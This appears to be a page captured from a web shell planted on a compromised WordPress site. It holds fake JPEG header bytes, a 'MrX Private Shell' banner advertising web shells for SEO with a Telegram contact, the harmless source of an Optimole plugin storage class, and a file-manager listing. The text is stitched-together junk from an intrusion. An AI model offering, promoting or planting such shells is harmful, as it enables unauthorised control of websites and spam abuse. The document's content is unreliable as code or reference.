����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace OptimoleWP\PageProfiler\Storage;
/**
* Abstract base class for storage implementations.
*
* This class defines the interface for storage operations that concrete
* implementations must provide.
*/
abstract class Base {
/**
* Store data with the given key.
*
* @param string $key The unique identifier for the data.
* @param array $data The data to store.
*/
abstract public function store( string $key, array $data );
/**
* Retrieve data by key.
*
* @param string $key The unique identifier for the data to retrieve.
* @return array|false The stored data or null if not found.
*/
abstract public function get( string $key );
/**
* Delete data by key.
*
* @param string $key The unique identifier for the data to delete.
*/
abstract public function delete( string $key );
/**
* Delete all stored data.
*/
abstract public function delete_all();
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Base.php | File | 914 B | 0644 |
|
| ObjectCache.php | File | 1.98 KB | 0644 |
|
| Transients.php | File | 2.25 KB | 0644 |
|